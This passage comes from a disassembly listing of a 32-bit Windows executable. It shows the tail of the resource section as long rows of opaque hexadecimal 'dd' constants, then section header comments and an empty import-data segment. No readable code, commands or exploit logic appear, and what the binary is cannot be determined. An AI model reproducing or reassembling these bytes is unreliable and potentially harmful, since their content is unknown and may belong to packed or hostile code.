8D36E843h, 0B6430553h, 0BDBAB6A9h, 1C66244Dh dd 888B99EEh, 69AE7B30h, 0B35409C1h, 4F16B6E7h, 0BC01FE48h dd 456A9D79h, 1B9C87AEh, 328C4BD3h, 59EB614Fh, 2CBDC87Eh dd 0B6DBE312h, 0D25D494Eh, 0CE0E9F9h, 0D35D7A12h, 83E8E1FFh dd 20B6C489h, 0A3372A25h, 62FC9CBDh, 3A829B8Bh, 0D9382674h dd 61CD9292h, 5F3A7B7Eh, 802F284Ah, 56DAAFB2h, 0EF78327Ah dd 0AE431810h, 5EF8FDB2h, 0B2001C11h, 9919E1F0h, 68E9DE8Ah dd 0C45A5B55h, 0CFB3EDF0h, 209D87D3h, 96792A22h, 6BEDC5CBh dd 59C07761h, 0EB695E7Ch, 7EC2DDD0h, 77357379h, 5E98FA65h dd 0F1D747h, 8529725h, 48858669h, 7E53D4AEh, 0F25F7342h dd 7C4B67E4h, 496E6512h, 1D3E7977h, 0D70279Eh, 8D86500Fh dd 0CB6166D8h, 18EE3F44h, 0ABDBD02Bh, 801D57B6h, 0C2CF9C80h dd 6DEB0B50h, 0E0707956h, 3BCB8EBDh, 67CE6A30h, 857E7376h dd 57516CC6h, 2A377271h, 0CDB99CA8h, 6ED07AB9h, 3FE3A1AFh dd 12DC2074h, 4A48BD85h, 3BA46352h, 0EC387D19h, 0C38312F3h dd 0D9595A8Ch, 71B4432h dd 0EE2386E0h, 904683F6h, 65F9E2A8h, 0D46C0790h, 8FA5AA79h dd 23E6CD2Dh, 3A7CAFA3h, 5F1961A7h, 66F73231h, 840A1866h dd 219FCCB6h, 775A5042h, 2D464518h, 10BE3638h, 8854706Ah dd 0B3496D09h, 4ACF8A90h, 0CA6B0838h, 718A90DEh, 0B01F15A8h dd 9A68C3BAh, 367DA1AFh, 9F0E6413h, 8648DDAAh, 55E8F8E7h dd 8F268804h, 9B619899h, 28F99782h, 7DEC0198h, 9E3A4588h dd 0BCC7E1E1h, 6CDCD03Ch, 0BA2DD9B5h, 4F5DEBACh, 97CBC0C0h dd 2A17242h, 0DEE50A0Bh, 4ABAADB6h, 6487999h, 82FB0605h dd 3AA99F06h, 20B1BC52h, 968D4A15h, 0D6575B49h, 31C3FF22h dd 0BEE24C26h, 0D75B360Ah, 0CBB7DEECh, 0CE93B915h, 0F989A4A2h dd 0FD0CE598h, 47C0B5B6h, 99AA4B0h, 29CA7E98h, 0B7CA5503h dd 91AAB5B5h, 0AB062C51h, 805BEA0Ch, 0D33EC980h, 71162120h dd 0C1716A38h, 0B9C3D7D6h, 972732DAh, 0F0DECE7Ah, 4D3C6CE8h dd 0D6B94342h, 23B3BEBDh, 8A69F7D8h, 51485353h, 0EB5C5309h dd 6E378B06h, 8BD26463h, 34FE34B6h, 7B7CDB32h, 0DF81B547h dd 7F4C18CCh, 0BBA5A23Ah, 37BB6B5h, 0B9291CB6h, 0A13193D3h dd 0DB111C96h, 54E7C2C1h, 827266D1h, 0F1F340A7h, 0E3F7FCFDh dd 0C2535ED3h, 2D8D0C3Ch, 26821422h, 3BBA6C51h, 0D140379Fh dd 0C39B5851h, 0E475E05Ah, 692E5039h, 173F4C37h, 0C596913Ah dd 409BEFEAh, 0AB3AB4FCh, 0A364F5A0h, 6312FD4Ah, 0E213F3A5h dd 8596BDE3h, 72808A81h, 443B6867h, 0D7475852h, 66C3F6E2h dd 55348687h, 73CAD899h, 9265A23Eh, 6657C9A2h, 4ADABA63h dd 8573873Fh, 20B0BBBAh, 0D0C2BE7Ch, 33CE401Ah, 11909B8Ch dd 18F34C3Fh, 0CE1CE863h, 0A2A1FEBAh, 0F70C4F75h, 0E7575DF4h dd 3A80CCCCh, 0BE4D6B26h, 0CAF3E750h, 1BD151B9h, 0AE2984BBh dd 0F68994A3h, 0AB187B6Ah, 8C8AB5B6h, 0F59A9594h, 55D8926Ah dd 0DFFAA55Ah, 0E4AA8585h, 462EDD85h, 0DAEDE66Bh, 0A1BBF6F6h dd 0B72632B4h, 88232D7Ch, 3A7928D7h, 67270202h, 0C3AEE818h dd 496817E8h, 56387373h, 34B8530Bh, 0A05875F9h, 4548637Ah dd 2593AD1Ah, 0FA015F0Ah, 0CA694839h, 15B31A3Ch, 430F1A2Ah dd 0DB6A759Dh, 37AF8DD0h, 0BBCDC6AAh, 1C2386B6h, 3F5320EEh dd 27310C29h, 350F5457h, 99E8020Dh, 835735C8h, 1EA06BA8h dd 1DF82903h, 0BFD23841h, 6FC2B59Ch, 91690766h, 2B9B90AAh dd 7457CFBCh, 62E5DAD9h, 1A8A7FADh, 6D2FF5BBh, 891F604Dh dd 0F686B428h, 0F4098CEBh, 0D9C3B8B9h, 23D32998h, 9D4471CCh dd 364C6779h, 99C1BAE2h, 0B37h, 0CE353E4Dh, 0A2B83CC3h dd 0D61374DAh, 76FB8629h, 0B9C9E4F8h, 0ABA527EBh, 0AC40B5D6h dd 8D59E690h, 5B3DA844h, 7E786464h, 3D150A09h, 0B731E892h dd 0A34BABACh, 6CFB29BFh, 0C7468961h, 273BCBCh, 7D3CAF17h dd 0DB8F7272h, 0F1C2CDCDh, 0DA90280Ch, 0C7B58FA7h, 38D3265Dh dd 9FC65920h, 71899494h, 8D4CBBBh, 5DBE50C1h, 0BAA8E12h dd 9A1B07E8h, 0C4923AA5h, 150Dh dup(0) _rsrc ends ; Section 4. (virtual address 0000F000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 0000E400 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 100F000h align 2000h _idata2 ends end start